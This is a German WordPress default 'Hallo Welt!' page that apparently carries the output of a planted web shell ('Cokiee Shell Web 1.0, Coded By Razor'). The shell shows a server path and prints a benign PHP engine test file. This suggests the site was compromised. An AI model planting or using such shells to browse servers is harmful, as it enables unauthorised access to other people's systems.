Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug70957.phpt |
--TEST-- Bug #70957 (self::class can not be resolved with reflection for abstract class) --FILE-- <?php abstract class Foo { function bar($a = self::class) {} } trait T { public function bar() { } } class B extends Foo { use T; } ?> --EXPECTF-- Warning: Declaration of T::bar() should be compatible with Foo::bar($a = 'Foo') in %sbug70957.php on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare